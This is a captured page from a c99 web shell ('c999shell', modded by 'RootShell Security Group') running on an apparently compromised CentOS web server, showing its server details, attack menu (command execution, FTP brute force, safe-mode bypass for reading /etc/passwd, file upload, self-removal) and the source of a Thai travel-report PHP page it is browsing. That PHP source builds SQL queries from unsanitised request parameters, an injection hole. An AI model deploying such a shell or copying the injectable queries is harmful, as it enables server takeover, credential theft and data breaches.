!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/Plan_new/   drwxr-xr-x
Free 52.63 GB of 127.8 GB (41.18%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ReportFormList.php (21.26 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
"; echo "


กรุณาทำการ Login ก่อน

"; echo ""; exit(); } else { /** Configuration */ include( "../configuration.php" ); require_once( $_Config_absolute_path . "/includes/framework.php" ); require_once( "../includes/Function.php" ); /** Create Database Object */ $dbObj = new DBConn; /** Config Table for This Page */ /** Config Table for This Page */ $myTable = "formaoffice"; $myTable1 = "personal_tb"; $myTable3 = "budget_year_tb"; $myTablePK = "codeId"; $myTableField1 = "fc.maNo"; $myTableField2 = "fc.Orderlist"; $myTableField3 = "fc.Training_name"; $myTableField4 = "fc.Budget_use"; /** Paging */ $page = $_GET['page']; if( $page == "" ) { $page = 1; } if( $Year == "" ) $Year = date("Y")-543; /** Keyword and Field */ $keyword = $_REQUEST['keyword']; $selectType = $_REQUEST['selectType']; /** จำนวนข้อมูล ต่อ 1 หน้า */ $perpage = $_REQUEST['perpage']; if( $perpage == "" ) { $perpage = 50; } //** Parameter */ $param = "Year_std=$Year_std&keyword=$keyword&selectType=$selectType"; } # else ?> <?=$_Config_sitename;?> - ข้อมูลงานวิจัย - ข้อมูลงานวิจัยตามรายบุคคล - ค้นหางานวิจัย
execQuery($query); $numrows = $dbObj->_numrows; //echo $query; /** Paging */ $display = ( !isset ($_GET['page']) ) ? 1 : $_GET['page']; $start = ( ($display * $limit) - $limit ); /** Paging */ if( $keyword != "" ) { if( $selectTypeBook != "" ) { if( isset($_GET['OrderBy']) ) { switch( $selectTypeBook ) { case 1 : $query = " SELECT * FROM formaoffice fc ,personal_tb pa WHERE fc.Year_std='$Year_std' and pa.StatusId ='1' and fc.Teacher_code=pa.Teacher_code $myTableField1 LIKE '%$keyword%' Group By fc.Teacher_code ORDER BY $OrderBy $ASCDESC " ; break; case 2 : $query = " SELECT * FROM formaoffice fc ,personal_tb pa WHERE fc.Year_std='$Year_std' and pa.StatusId ='1' and fc.Teacher_code=pa.Teacher_code $myTableField2 LIKE '%$keyword%' Group By fc.Teacher_code ORDER BY $OrderBy $ASCDESC "; break; case 3 : $query = " SELECT * FROM formaoffice fc ,personal_tb pa WHERE fc.Year_std='$Year_std' and pa.StatusId ='1' and fc.Teacher_code=pa.Teacher_code AND $myTableField3 LIKE '%$keyword%' Group By fc.Teacher_code ORDER BY $OrderBy $ASCDESC "; break; case 4 : $query = " SELECT * FROM formaoffice fc ,personal_tb pa WHERE fc.Year_std='$Year_std' and pa.StatusId ='1' and fc.Teacher_code=pa.Teacher_code AND $myTableField4 LIKE '%$keyword%' Group By fc.Teacher_code ORDER BY $OrderBy $ASCDESC "; break; } # switch } # if elseif( !isset($_GET['OrderBy']) ) { switch( $selectTypeBook ) { case 1 : $query = " SELECT * FROM formaoffice fc ,personal_tb pa WHERE fc.Year_std='$Year_std' and pa.StatusId ='1' and fc.Teacher_code=pa.Teacher_code AND $myTableField1 LIKE '%$keyword%' Group By fc.Teacher_code ORDER BY $myTablePK ASC "; break; case 2 : $query = " SELECT * FROM formaoffice fc ,personal_tb pa WHERE fc.Year_std='$Year_std' and pa.StatusId ='1' and fc.Teacher_code=pa.Teacher_code AND $myTableField2 LIKE '%$keyword%' Group By fc.Teacher_code ORDER BY $myTablePK ASC "; break; case 3 : $query = " SELECT * FROM formaoffice fc ,personal_tb pa WHERE fc.Year_std='$Year_std' and pa.StatusId ='1' and fc.Teacher_code=pa.Teacher_code AND $myTableField3 LIKE '%$keyword%' Group By fc.Teacher_code ORDER BY $myTablePK ASC "; break; case 4 : $query = " SELECT * FROM formaoffice fc ,personal_tb pa WHERE fc.Year_std='$Year_std' and pa.StatusId ='1' and fc.Teacher_code=pa.Teacher_code AND $myTableField4 LIKE '%$keyword%' Group By fc.Teacher_code ORDER BY $myTablePK ASC "; break; } # switch } # elseif } else { // หาเฉพาะที่ใส่ Keyword if( isset($_GET['OrderBy']) ) { $query = " SELECT * FROM formaoffice fc ,personal_tb pa WHERE fc.Year_std='$Year_std' and pa.StatusId ='1' and fc.Teacher_code=pa.Teacher_code AND ( $myTableField1 LIKE '%$keyword%' OR $myTableField2 LIKE '%$keyword%' OR $myTableField3 LIKE '%$keyword%' OR $myTableField4 LIKE '%$keyword%' ) Group By fc.Teacher_code ORDER BY $OrderBy $ASCDESC "; } elseif( !isset($_GET['OrderBy']) ) { $query = " SELECT * FROM formaoffice fc ,personal_tb pa WHERE fc.Year_std='$Year_std' and pa.StatusId ='1' and fc.Teacher_code=pa.Teacher_code AND ( $myTableField1 LIKE '%$keyword%' OR $myTableField2 LIKE '%$keyword%' OR $myTableField3 LIKE '%$keyword%' OR $myTableField4 LIKE '%$keyword%' ) Group By fc.Teacher_code ORDER BY $myTablePK ASC "; } } # else } else { if( isset($_GET['OrderBy']) ) { $query = " SELECT * FROM formaoffice fc ,personal_tb pa WHERE fc.Year_std='$Year_std' and pa.StatusId ='1' and fc.Teacher_code=pa.Teacher_code Group By fc.Teacher_code ORDER BY $OrderBy $ASCDESC "; } elseif( !isset($_GET['OrderBy']) ) { $query = " SELECT * FROM formaoffice fc ,personal_tb pa WHERE fc.Year_std='$Year_std' and pa.StatusId ='1' and fc.Teacher_code=pa.Teacher_code Group By fc.Teacher_code ORDER BY $myTablePK ASC "; } # elseif } # else $query .= " LIMIT $start, $limit "; $result = $dbObj->execQuery($query); ?>
หน้าหลัก » เมนูแสดงรายละเอียดของแผน » ข้อมูลการไปราชการตามรายบุคคล » แสดงรายการเดินทางไปราชการ
‹ ย้อนกลับ
 
ทั้งหมด: รายการ จำนวนข้อมูลต่อหน้า
0 ) { ?>
ค้นหา จาก ส่งออกข้อมูล ›
   
fetchArray($result) ) { $bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF"; ?> freeresult($result); ?>
ลำดับ รายชื่อผู้ขออนุมัติเดินทางไปราชการ ตำแหน่ง จำนวนครั้ง จำนวนวัน จำนวนเงิน
 execQuery($sql1); $rs6 = $dbObj->fetchArray($result6); echo "$rs6[prefixName] $rs6[Teacher_name]   $rs6[Teacher_lastname]"; ?>   execQuery($sql2); $numrows2 = $dbObj->_numrows; echo $numrows2; ?> execQuery($query6); $rs6 = $dbObj->fetchArray($result6); $dbObj->freeresult($rs6); echo number_format($rs6['Day']) ; ?> execQuery($sql3); $rs3 = $dbObj->fetchArray($result3); echo number_format($rs3['SumB1'],2,'.',','); ?>
รวมเงินทั้งหมด execQuery($sql2); $numrows2 = $dbObj->_numrows; echo $numrows2; ?>   execQuery($sql3); $rs3 = $dbObj->fetchArray($result3); echo number_format($rs3['SumB1'],2,'.',','); ?>
ไม่พบรายการที่ค้นหา
กรุณาลองใหม่อีกครั้ง

0 ) { ?>
Page : 1) { $previous = $display - 1; ?> |« หน้าแรก  « ก่อนหน้า $scroll) { $first = $_GET['page']; $last = ($scroll - 1) + $_GET['page']; } else { $first = 1; $last = $paging; } if($last > $paging ) { $first = $paging - ($scroll - 1); $last = $paging; } for($i=$first; $i<=$last; $i++) { if($display == $i) { echo " [$i] "; } else { //echo " $i "; printf(" %s ", $_SERVER['PHP_SELF'], $i, $perpage, $OrderBy, $ASCDESC, $Year_std, $keyword, $selectType, $i); } } // end..for } // end..if if($display < $paging) { $next = $display + 1; ?>  ถัดไป »  หน้าสุดท้าย »| Total:
 
freeresult($result); /** Close the Database */ $dbObj->disconn(); /** Unset Class */ unset($dbObj); ?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]--